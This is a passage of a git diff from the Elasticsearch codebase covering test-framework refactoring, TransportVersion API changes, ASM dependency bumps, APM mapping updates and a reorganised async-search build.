Integer.parseInt(len); + } + }; + } + @Override public boolean hasContent() { - return body.isEmpty() == false; + return contentLength() > 0; } @Override @@ -237,6 +247,11 @@ public Builder withBody(HttpBody body) { return this; } + public Builder withContentLength(int length) { + headers.put("Content-Length", List.of(String.valueOf(length))); + return this; + } + public Builder withPath(String path) { this.path = path; return this; diff --git a/test/framework/src/main/java/org/elasticsearch/test/transport/MockTransport.java b/test/framework/src/main/java/org/elasticsearch/test/transport/MockTransport.java index 165f2522c5541..adfe81b96223c 100644 --- a/test/framework/src/main/java/org/elasticsearch/test/transport/MockTransport.java +++ b/test/framework/src/main/java/org/elasticsearch/test/transport/MockTransport.java @@ -22,7 +22,6 @@ import org.elasticsearch.core.Nullable; import org.elasticsearch.core.Tuple; import org.elasticsearch.tasks.TaskManager; -import org.elasticsearch.telemetry.tracing.Tracer; import org.elasticsearch.threadpool.ThreadPool; import org.elasticsearch.transport.CloseableConnection; import org.elasticsearch.transport.ClusterConnectionManager; @@ -74,8 +73,7 @@ public TransportService createTransportService( localNodeFactory, clusterSettings, connectionManager, - new TaskManager(settings, threadPool, taskHeaders), - Tracer.NOOP + new TaskManager(settings, threadPool, taskHeaders) ); } diff --git a/test/framework/src/main/java/org/elasticsearch/test/transport/MockTransportService.java b/test/framework/src/main/java/org/elasticsearch/test/transport/MockTransportService.java index 3f6cf453fd0d1..874b4e6b4bae8 100644 --- a/test/framework/src/main/java/org/elasticsearch/test/transport/MockTransportService.java +++ b/test/framework/src/main/java/org/elasticsearch/test/transport/MockTransportService.java @@ -307,8 +307,7 @@ private MockTransportService( localNodeFactory, clusterSettings, new StubbableConnectionManager(new ClusterConnectionManager(settings, transport, threadPool.getThreadContext())), - taskManager, - Tracer.NOOP + taskManager ); this.original = transport.getDelegate(); this.testExecutor = EsExecutors.newScaling( diff --git a/test/framework/src/main/java/org/elasticsearch/transport/AbstractSimpleTransportTestCase.java b/test/framework/src/main/java/org/elasticsearch/transport/AbstractSimpleTransportTestCase.java index b54e9fca82069..b9d618c7e3ca5 100644 --- a/test/framework/src/main/java/org/elasticsearch/transport/AbstractSimpleTransportTestCase.java +++ b/test/framework/src/main/java/org/elasticsearch/transport/AbstractSimpleTransportTestCase.java @@ -15,7 +15,6 @@ import org.elasticsearch.ElasticsearchException; import org.elasticsearch.ExceptionsHelper; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.Version; import org.elasticsearch.action.ActionListener; import org.elasticsearch.action.ActionListenerResponseHandler; @@ -2307,7 +2306,7 @@ public void testRegisterHandlerTwice() { public void testHandshakeWithIncompatVersion() { assumeTrue("only tcp transport has a handshake method", serviceA.getOriginalTransport() instanceof TcpTransport); - TransportVersion transportVersion = TransportVersion.fromId(TransportVersions.MINIMUM_COMPATIBLE.id() - 1); + TransportVersion transportVersion = TransportVersion.fromId(TransportVersion.minimumCompatible().id() - 1); try ( MockTransportService service = buildService( "TS_C", @@ -2344,7 +2343,7 @@ public void testHandshakeUpdatesVersion() throws IOException { assumeTrue("only tcp transport has a handshake method", serviceA.getOriginalTransport() instanceof TcpTransport); TransportVersion transportVersion = TransportVersionUtils.randomVersionBetween( random(), - TransportVersions.MINIMUM_COMPATIBLE, + TransportVersion.minimumCompatible(), TransportVersion.current() ); try ( diff --git a/test/framework/src/main/java/org/elasticsearch/transport/DisruptableMockTransport.java b/test/framework/src/main/java/org/elasticsearch/transport/DisruptableMockTransport.java index a7dac8f727b0c..5a3b1d8faeb21 100644 --- a/test/framework/src/main/java/org/elasticsearch/transport/DisruptableMockTransport.java +++ b/test/framework/src/main/java/org/elasticsearch/transport/DisruptableMockTransport.java @@ -23,7 +23,6 @@ import org.elasticsearch.core.Nullable; import org.elasticsearch.core.Releasables; import org.elasticsearch.tasks.TaskManager; -import org.elasticsearch.telemetry.tracing.Tracer; import org.elasticsearch.test.transport.MockTransport; import org.elasticsearch.threadpool.ThreadPool; @@ -76,8 +75,7 @@ public TransportService createTransportService( interceptor, localNodeFactory, clusterSettings, - new TaskManager(settings, threadPool, taskHeaders), - Tracer.NOOP + new TaskManager(settings, threadPool, taskHeaders) ); } diff --git a/test/framework/src/test/java/org/elasticsearch/bootstrap/TestScopeResolverTests.java b/test/framework/src/test/java/org/elasticsearch/bootstrap/TestScopeResolverTests.java index 24d8f26342797..e489d8dc7a17c 100644 --- a/test/framework/src/test/java/org/elasticsearch/bootstrap/TestScopeResolverTests.java +++ b/test/framework/src/test/java/org/elasticsearch/bootstrap/TestScopeResolverTests.java @@ -13,6 +13,7 @@ import org.elasticsearch.test.ESTestCase; import java.util.List; +import java.util.Set; import static org.hamcrest.Matchers.is; @@ -23,7 +24,7 @@ public void testScopeResolverServerClass() { "server", List.of(new TestBuildInfoLocation("org/elasticsearch/Build.class", "org.elasticsearch.server")) ); - var resolver = TestScopeResolver.createScopeResolver(testBuildInfo, List.of()); + var resolver = TestScopeResolver.createScopeResolver(testBuildInfo, List.of(), Set.of()); var scope = resolver.apply(Plugin.class); assertThat(scope.componentName(), is("(server)")); @@ -39,7 +40,7 @@ public void testScopeResolverInternalClass() { "test-component", List.of(new TestBuildInfoLocation("org/elasticsearch/bootstrap/TestBuildInfoParserTests.class", "test-module-name")) ); - var resolver = TestScopeResolver.createScopeResolver(testBuildInfo, List.of(testOwnBuildInfo)); + var resolver = TestScopeResolver.createScopeResolver(testBuildInfo, List.of(testOwnBuildInfo), Set.of("test-component")); var scope = resolver.apply(this.getClass()); assertThat(scope.componentName(), is("test-component")); diff --git a/test/framework/src/test/java/org/elasticsearch/entitlement/runtime/policy/TestPolicyManagerTests.java b/test/framework/src/test/java/org/elasticsearch/entitlement/runtime/policy/TestPolicyManagerTests.java index 1efe76f82c8b5..35a7d29194700 100644 --- a/test/framework/src/test/java/org/elasticsearch/entitlement/runtime/policy/TestPolicyManagerTests.java +++ b/test/framework/src/test/java/org/elasticsearch/entitlement/runtime/policy/TestPolicyManagerTests.java @@ -13,11 +13,17 @@ import org.elasticsearch.test.ESTestCase; import org.junit.Before; +import java.nio.file.Path; +import java.util.Arrays; import java.util.List; import java.util.Map; import java.util.concurrent.atomic.AtomicInteger; +import java.util.stream.Stream; import static org.elasticsearch.entitlement.runtime.policy.PolicyManager.ComponentKind.PLUGIN; +import static org.hamcrest.Matchers.both; +import static org.hamcrest.Matchers.containsString; +import static org.hamcrest.Matchers.equalTo; public class TestPolicyManagerTests extends ESTestCase { TestPolicyManager policyManager; @@ -30,23 +36,45 @@ public void setupPolicyManager() { List.of(), Map.of(), c -> new PolicyScope(PLUGIN, "example-plugin" + scopeCounter.incrementAndGet(), "org.example.module"), - Map.of(), - new TestPathLookup() + new PathLookup() { + @Override + public Path pidFile() { + return null; + } + + @Override + public Stream getBaseDirPaths(BaseDir baseDir) { + return Stream.empty(); + } + + @Override + public Stream resolveSettingPaths(BaseDir baseDir, String settingName) { + return Stream.empty(); + } + + @Override + public boolean isPathOnDefaultFilesystem(Path path) { + return true; + } + }, + List.of(), + List.of() ); + policyManager.setActive(true); } - public void testReset() { - assertTrue(policyManager.moduleEntitlementsMap.isEmpty()); + public void testClearModuleEntitlementsCache() { + assertTrue(policyManager.classEntitlementsMap.isEmpty()); assertEquals("example-plugin1", policyManager.getEntitlements(getClass()).componentName()); assertEquals("example-plugin1", policyManager.getEntitlements(getClass()).componentName()); - assertFalse(policyManager.moduleEntitlementsMap.isEmpty()); + assertFalse(policyManager.classEntitlementsMap.isEmpty()); - policyManager.reset(); + policyManager.clearModuleEntitlementsCache(); - assertTrue(policyManager.moduleEntitlementsMap.isEmpty()); + assertTrue(policyManager.classEntitlementsMap.isEmpty()); assertEquals("example-plugin2", policyManager.getEntitlements(getClass()).componentName()); assertEquals("example-plugin2", policyManager.getEntitlements(getClass()).componentName()); - assertFalse(policyManager.moduleEntitlementsMap.isEmpty()); + assertFalse(policyManager.classEntitlementsMap.isEmpty()); } public void testIsTriviallyAllowed() { @@ -54,6 +82,47 @@ public void testIsTriviallyAllowed() { assertTrue(policyManager.isTriviallyAllowed(org.junit.Before.class)); assertTrue(policyManager.isTriviallyAllowed(PolicyManager.class)); + assertTrue(policyManager.isTriviallyAllowed(getClass())); + policyManager.setTriviallyAllowingTestCode(false); assertFalse(policyManager.isTriviallyAllowed(getClass())); } + + public void testDefaultEntitledTestPackages() { + String[] testPackages = policyManager.entitledTestPackages.clone(); + TestPolicyManager.assertNoRedundantPrefixes(testPackages, testPackages, true); + + Arrays.sort(testPackages); + assertThat("Entitled test framework packages are not sorted", policyManager.entitledTestPackages, equalTo(testPackages)); + } + + public void testRejectSetRedundantEntitledTestPackages() { + var throwable = expectThrows(AssertionError.class, () -> policyManager.setEntitledTestPackages("org.apache.lucene.tests")); + var baseMatcher = both(containsString("Redundant prefix entries")); + assertThat(throwable.getMessage(), baseMatcher.and(containsString("org.apache.lucene.tests, org.apache.lucene.tests"))); + + throwable = expectThrows(AssertionError.class, () -> policyManager.setEntitledTestPackages("org.apache.lucene")); + assertThat(throwable.getMessage(), baseMatcher.and(containsString("org.apache.lucene.tests, org.apache.lucene"))); + + throwable = expectThrows(AssertionError.class, () -> policyManager.setEntitledTestPackages("org.apache.lucene.tests.whatever")); + assertThat(throwable.getMessage(), baseMatcher.and(containsString("org.apache.lucene.tests, org.apache.lucene.tests.whatever"))); + + throwable = expectThrows(AssertionError.class, () -> policyManager.setEntitledTestPackages("my.package", "my.package.sub")); + assertThat(throwable.getMessage(), baseMatcher.and(containsString("my.package, my.package.sub"))); + + throwable = expectThrows(AssertionError.class, () -> policyManager.setEntitledTestPackages("trailing.dot.")); + assertThat(throwable.getMessage(), containsString("Invalid package prefix ending with '.' [trailing.dot.]")); + } + + public void testIsTestFrameworkClass() { + String[] sortedPrefixes = { "a.b", "a.bc", "a.c" }; + + assertTrue(TestPolicyManager.isTestFrameworkClass(sortedPrefixes, "a.b")); + assertTrue(TestPolicyManager.isTestFrameworkClass(sortedPrefixes, "a.b.c")); + assertTrue(TestPolicyManager.isTestFrameworkClass(sortedPrefixes, "a.bc")); + assertTrue(TestPolicyManager.isTestFrameworkClass(sortedPrefixes, "a.bc.a")); + + assertFalse(TestPolicyManager.isTestFrameworkClass(sortedPrefixes, "a")); + assertFalse(TestPolicyManager.isTestFrameworkClass(sortedPrefixes, "a.ba")); + assertFalse(TestPolicyManager.isTestFrameworkClass(sortedPrefixes, "a.bcc")); + } } diff --git a/test/framework/src/test/java/org/elasticsearch/test/test/InternalTestClusterTests.java b/test/framework/src/test/java/org/elasticsearch/test/test/InternalTestClusterTests.java index f5c358b3b3301..392ec929e39c3 100644 --- a/test/framework/src/test/java/org/elasticsearch/test/test/InternalTestClusterTests.java +++ b/test/framework/src/test/java/org/elasticsearch/test/test/InternalTestClusterTests.java @@ -85,7 +85,8 @@ public void testInitializiationIsConsistent() { numClientNodes, nodePrefix, Collections.emptyList(), - Function.identity() + Function.identity(), + TEST_ENTITLEMENTS::addEntitledNodePaths ); InternalTestCluster cluster1 = new InternalTestCluster( clusterSeed, @@ -99,7 +100,8 @@ public void testInitializiationIsConsistent() { numClientNodes, nodePrefix, Collections.emptyList(), - Function.identity() + Function.identity(), + TEST_ENTITLEMENTS::addEntitledNodePaths ); assertClusters(cluster0, cluster1, true); } @@ -198,7 +200,8 @@ public Path nodeConfigPath(int nodeOrdinal) { numClientNodes, nodePrefix, mockPlugins(), - Function.identity() + Function.identity(), + TEST_ENTITLEMENTS::addEntitledNodePaths ); cluster0.setBootstrapMasterNodeIndex(bootstrapMasterNodeIndex); @@ -214,7 +217,8 @@ public Path nodeConfigPath(int nodeOrdinal) { numClientNodes, nodePrefix, mockPlugins(), - Function.identity() + Function.identity(), + TEST_ENTITLEMENTS::addEntitledNodePaths ); cluster1.setBootstrapMasterNodeIndex(bootstrapMasterNodeIndex); @@ -280,7 +284,8 @@ public Path nodeConfigPath(int nodeOrdinal) { numClientNodes, nodePrefix, mockPlugins(), - Function.identity() + Function.identity(), + TEST_ENTITLEMENTS::addEntitledNodePaths ); try { cluster.beforeTest(random()); @@ -375,7 +380,8 @@ public Path nodeConfigPath(int nodeOrdinal) { 0, "", mockPlugins(), - Function.identity() + Function.identity(), + TEST_ENTITLEMENTS::addEntitledNodePaths ); cluster.beforeTest(random()); List roles = new ArrayList<>(); @@ -467,7 +473,8 @@ public Path nodeConfigPath(int nodeOrdinal) { 0, nodePrefix, plugins, - Function.identity() + Function.identity(), + TEST_ENTITLEMENTS::addEntitledNodePaths ); try { cluster.beforeTest(random()); diff --git a/test/immutable-collections-patch/build.gradle b/test/immutable-collections-patch/build.gradle index 852a19116fb71..d444ef8b7af79 100644 --- a/test/immutable-collections-patch/build.gradle +++ b/test/immutable-collections-patch/build.gradle @@ -17,8 +17,8 @@ configurations { } dependencies { - implementation 'org.ow2.asm:asm:9.7.1' - implementation 'org.ow2.asm:asm-tree:9.7.1' + implementation 'org.ow2.asm:asm:9.8' + implementation 'org.ow2.asm:asm-tree:9.8' } def outputDir = layout.buildDirectory.dir("jdk-patches") diff --git a/test/logger-usage/build.gradle b/test/logger-usage/build.gradle index 6d6c5ff889a45..784147aec69cd 100644 --- a/test/logger-usage/build.gradle +++ b/test/logger-usage/build.gradle @@ -10,9 +10,9 @@ apply plugin: 'elasticsearch.java' dependencies { - api 'org.ow2.asm:asm:9.7.1' - api 'org.ow2.asm:asm-tree:9.7.1' - api 'org.ow2.asm:asm-analysis:9.7.1' + api 'org.ow2.asm:asm:9.8' + api 'org.ow2.asm:asm-tree:9.8' + api 'org.ow2.asm:asm-analysis:9.8' api "org.apache.logging.log4j:log4j-api:${versions.log4j}" testImplementation project(":test:framework") } diff --git a/test/test-clusters/src/main/java/org/elasticsearch/test/cluster/FeatureFlag.java b/test/test-clusters/src/main/java/org/elasticsearch/test/cluster/FeatureFlag.java index 8f25ee838b3a0..a23a4b866998b 100644 --- a/test/test-clusters/src/main/java/org/elasticsearch/test/cluster/FeatureFlag.java +++ b/test/test-clusters/src/main/java/org/elasticsearch/test/cluster/FeatureFlag.java @@ -21,7 +21,8 @@ public enum FeatureFlag { DOC_VALUES_SKIPPER("es.doc_values_skipper_feature_flag_enabled=true", Version.fromString("8.18.1"), null), USE_LUCENE101_POSTINGS_FORMAT("es.use_lucene101_postings_format_feature_flag_enabled=true", Version.fromString("9.1.0"), null), IVF_FORMAT("es.ivf_format_feature_flag_enabled=true", Version.fromString("9.1.0"), null), - LOGS_STREAM("es.logs_stream_feature_flag_enabled=true", Version.fromString("9.1.0"), null); + LOGS_STREAM("es.logs_stream_feature_flag_enabled=true", Version.fromString("9.1.0"), null), + PATTERNED_TEXT("es.patterned_text_feature_flag_enabled=true", Version.fromString("9.1.0"), null); public final String systemProperty; public final Version from; diff --git a/test/test-clusters/src/main/java/org/elasticsearch/test/cluster/local/DefaultSettingsProvider.java b/test/test-clusters/src/main/java/org/elasticsearch/test/cluster/local/DefaultSettingsProvider.java index b53f4ece46134..2fdf0df41736a 100644 --- a/test/test-clusters/src/main/java/org/elasticsearch/test/cluster/local/DefaultSettingsProvider.java +++ b/test/test-clusters/src/main/java/org/elasticsearch/test/cluster/local/DefaultSettingsProvider.java @@ -42,6 +42,10 @@ public Map get(LocalNodeSpec nodeSpec) { } } + // Limit the number of allocated processors for all nodes in the cluster by default. + // This is to ensure that the tests run consistently across different environments. + settings.put("node.processors", "2"); + // Default the watermarks to absurdly low to prevent the tests from failing on nodes without enough disk space settings.put("cluster.routing.allocation.disk.watermark.low", "1b"); settings.put("cluster.routing.allocation.disk.watermark.high", "1b"); diff --git a/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/boxplot/BoxplotAggregationBuilder.java b/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/boxplot/BoxplotAggregationBuilder.java index 37e05898dfc48..ef99a55138482 100644 --- a/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/boxplot/BoxplotAggregationBuilder.java +++ b/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/boxplot/BoxplotAggregationBuilder.java @@ -194,6 +194,6 @@ public Optional> getOutputFieldNames() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/cumulativecardinality/CumulativeCardinalityPipelineAggregationBuilder.java b/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/cumulativecardinality/CumulativeCardinalityPipelineAggregationBuilder.java index 08f2011e94e83..05fe35ae9c58f 100644 --- a/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/cumulativecardinality/CumulativeCardinalityPipelineAggregationBuilder.java +++ b/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/cumulativecardinality/CumulativeCardinalityPipelineAggregationBuilder.java @@ -7,7 +7,6 @@ package org.elasticsearch.xpack.analytics.cumulativecardinality; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.search.DocValueFormat; @@ -133,6 +132,6 @@ protected boolean overrideBucketsPath() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/movingPercentiles/MovingPercentilesPipelineAggregationBuilder.java b/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/movingPercentiles/MovingPercentilesPipelineAggregationBuilder.java index ae93faa69f2c4..aebae0bcfce09 100644 --- a/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/movingPercentiles/MovingPercentilesPipelineAggregationBuilder.java +++ b/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/movingPercentiles/MovingPercentilesPipelineAggregationBuilder.java @@ -7,7 +7,6 @@ package org.elasticsearch.xpack.analytics.movingPercentiles; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.search.aggregations.pipeline.AbstractPipelineAggregationBuilder; @@ -134,6 +133,6 @@ protected boolean overrideBucketsPath() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/multiterms/MultiTermsAggregationBuilder.java b/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/multiterms/MultiTermsAggregationBuilder.java index bc1cd3fa05d52..25f9f576e36b7 100644 --- a/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/multiterms/MultiTermsAggregationBuilder.java +++ b/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/multiterms/MultiTermsAggregationBuilder.java @@ -8,7 +8,6 @@ package org.elasticsearch.xpack.analytics.multiterms; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.common.xcontent.LoggingDeprecationHandler; @@ -394,6 +393,6 @@ public boolean equals(Object obj) { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/normalize/NormalizePipelineAggregationBuilder.java b/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/normalize/NormalizePipelineAggregationBuilder.java index de32ab9587ef9..0c9c94f45b809 100644 --- a/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/normalize/NormalizePipelineAggregationBuilder.java +++ b/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/normalize/NormalizePipelineAggregationBuilder.java @@ -8,7 +8,6 @@ package org.elasticsearch.xpack.analytics.normalize; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.search.DocValueFormat; @@ -157,6 +156,6 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/rate/RateAggregationBuilder.java b/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/rate/RateAggregationBuilder.java index 0b2d3606854a4..f6e74c46ffa9e 100644 --- a/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/rate/RateAggregationBuilder.java +++ b/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/rate/RateAggregationBuilder.java @@ -7,7 +7,6 @@ package org.elasticsearch.xpack.analytics.rate; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.Rounding; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -216,6 +215,6 @@ public int hashCode() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/stringstats/StringStatsAggregationBuilder.java b/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/stringstats/StringStatsAggregationBuilder.java index ea5a0adffa0eb..67f4fddc7d926 100644 --- a/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/stringstats/StringStatsAggregationBuilder.java +++ b/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/stringstats/StringStatsAggregationBuilder.java @@ -7,7 +7,6 @@ package org.elasticsearch.xpack.analytics.stringstats; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.search.aggregations.AggregationBuilder; @@ -154,6 +153,6 @@ public boolean equals(Object obj) { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/topmetrics/TopMetricsAggregationBuilder.java b/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/topmetrics/TopMetricsAggregationBuilder.java index 93fd71b55332a..b20bdf4aa52c5 100644 --- a/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/topmetrics/TopMetricsAggregationBuilder.java +++ b/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/topmetrics/TopMetricsAggregationBuilder.java @@ -7,7 +7,6 @@ package org.elasticsearch.xpack.analytics.topmetrics; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.search.aggregations.AbstractAggregationBuilder; @@ -235,6 +234,6 @@ public Optional> getOutputFieldNames() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/ttest/TTestAggregationBuilder.java b/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/ttest/TTestAggregationBuilder.java index bbe497718b62a..0b455d0ba0129 100644 --- a/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/ttest/TTestAggregationBuilder.java +++ b/x-pack/plugin/analytics/src/main/java/org/elasticsearch/xpack/analytics/ttest/TTestAggregationBuilder.java @@ -8,7 +8,6 @@ package org.elasticsearch.xpack.analytics.ttest; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.index.query.QueryBuilder; @@ -182,6 +181,6 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/x-pack/plugin/apm-data/src/main/resources/component-templates/apm@mappings.yaml b/x-pack/plugin/apm-data/src/main/resources/component-templates/apm@mappings.yaml index ac6462c86676c..a5a3a7433f4c1 100644 --- a/x-pack/plugin/apm-data/src/main/resources/component-templates/apm@mappings.yaml +++ b/x-pack/plugin/apm-data/src/main/resources/component-templates/apm@mappings.yaml @@ -4,6 +4,7 @@ _meta: managed: true template: mappings: + date_detection: false dynamic: true dynamic_templates: - numeric_labels: diff --git a/x-pack/plugin/apm-data/src/main/resources/component-templates/metrics-apm@mappings.yaml b/x-pack/plugin/apm-data/src/main/resources/component-templates/metrics-apm@mappings.yaml index 660db3a6b0e2e..3f7b41ea7903c 100644 --- a/x-pack/plugin/apm-data/src/main/resources/component-templates/metrics-apm@mappings.yaml +++ b/x-pack/plugin/apm-data/src/main/resources/component-templates/metrics-apm@mappings.yaml @@ -6,6 +6,8 @@ _meta: template: mappings: properties: + system.process.cpu.start_time: + type: date processor.event: type: constant_keyword value: metric diff --git a/x-pack/plugin/apm-data/src/main/resources/resources.yaml b/x-pack/plugin/apm-data/src/main/resources/resources.yaml index d76fd19f57d0d..70675f1dd10d6 100644 --- a/x-pack/plugin/apm-data/src/main/resources/resources.yaml +++ b/x-pack/plugin/apm-data/src/main/resources/resources.yaml @@ -1,7 +1,7 @@ # "version" holds the version of the templates and ingest pipelines installed # by xpack-plugin apm-data. This must be increased whenever an existing template or # pipeline is changed, in order for it to be updated on Elasticsearch upgrade. -version: 16 +version: 101 component-templates: # Data lifecycle. diff --git a/x-pack/plugin/async-search/build.gradle b/x-pack/plugin/async-search/build.gradle index b013d1df46b97..edb0847575fde 100644 --- a/x-pack/plugin/async-search/build.gradle +++ b/x-pack/plugin/async-search/build.gradle @@ -1,5 +1,10 @@ +import org.elasticsearch.gradle.testclusters.StandaloneRestIntegTestTask + apply plugin: 'elasticsearch.internal-es-plugin' apply plugin: 'elasticsearch.internal-cluster-test' +apply plugin: 'elasticsearch.internal-java-rest-test' +apply plugin: 'elasticsearch.internal-yaml-rest-test' + esplugin { name = 'x-pack-async-search' description = 'A module which allows to track the progress of a search asynchronously.' @@ -10,17 +15,29 @@ base { archivesName = 'x-pack-async-search' } -addQaCheckDependencies(project) - dependencies { compileOnly project(":server") - testImplementation testArtifact(project(':server')) - compileOnly project(path: xpackModule('core')) - testImplementation(testArtifact(project(xpackModule('core')))) - testImplementation project(path: xpackModule('async')) + testImplementation testArtifact(project(':server')) + testImplementation testArtifact(project(xpackModule('core'))) + testImplementation project(xpackModule('async')) internalClusterTestImplementation project(":modules:reindex") + + javaRestTestImplementation testArtifact(project(xpackModule('core'))) + + clusterModules project(":x-pack:test:deprecated-query") + clusterModules project(':modules:analysis-common') + clusterModules project(':test:external-modules:test-error-query') } +restResources { + restApi { + include '_common', 'indices', 'index', 'async_search' + } +} +tasks.withType(StandaloneRestIntegTestTask).configureEach { + def isSnapshot = buildParams.snapshotBuild + it.onlyIf("snapshot build") { isSnapshot } +} diff --git a/x-pack/plugin/async-search/qa/rest/build.gradle b/x-pack/plugin/async-search/qa/rest/build.gradle deleted file mode 100644 index 7363aed336aaf..0000000000000 --- a/x-pack/plugin/async-search/qa/rest/build.gradle +++ /dev/null @@ -1,37 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. - */ - -apply plugin: 'elasticsearch.base-internal-es-plugin' -apply plugin: 'elasticsearch.internal-java-rest-test' -apply plugin: 'elasticsearch.legacy-yaml-rest-test' -apply plugin: 'elasticsearch.legacy-yaml-rest-compat-test' - -esplugin { - name = 'x-pack-test-deprecated-query' - description = 'Deprecated query plugin' - classname ='org.elasticsearch.query.DeprecatedQueryPlugin' -} - -dependencies { - clusterPlugins project(xpackModule('async-search')) -} - -restResources { - restApi { - include '_common', 'indices', 'index', 'async_search' - } -} - -testClusters.configureEach { - testDistribution = 'DEFAULT' - setting 'xpack.security.enabled', 'false' -} - -// Test clusters run with security disabled -tasks.named("yamlRestTest") { - buildParams.withFipsEnabledOnly(it) -} diff --git a/x-pack/plugin/async-search/qa/security/build.gradle b/x-pack/plugin/async-search/qa/security/build.gradle deleted file mode 100644 index 79a379c48bc6e..0000000000000 --- a/x-pack/plugin/async-search/qa/security/build.gradle +++ /dev/null @@ -1,11 +0,0 @@ -apply plugin: 'elasticsearch.internal-java-rest-test' - -dependencies { - javaRestTestImplementation(testArtifact(project(xpackModule('core')))) - javaRestTestImplementation project(xpackModule('async-search')) - javaRestTestImplementation project(':test:framework') -} - -tasks.named("javaRestTest").configure { - usesDefaultDistribution("to be triaged") -} diff --git a/x-pack/plugin/async-search/src/internalClusterTest/java/org/elasticsearch/xpack/search/AsyncSearchActionIT.java b/x-pack/plugin/async-search/src/internalClusterTest/java/org/elasticsearch/xpack/search/AsyncSearchActionIT.java index 91d35d79b7c87..e194759979ec4 100644 --- a/x-pack/plugin/async-search/src/internalClusterTest/java/org/elasticsearch/xpack/search/AsyncSearchActionIT.java +++ b/x-pack/plugin/async-search/src/internalClusterTest/java/org/elasticsearch/xpack/search/AsyncSearchActionIT.java @@ -11,7 +11,6 @@ import org.elasticsearch.ExceptionsHelper; import org.elasticsearch.ResourceNotFoundException; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.action.index.IndexRequestBuilder; import org.elasticsearch.common.settings.Settings; import 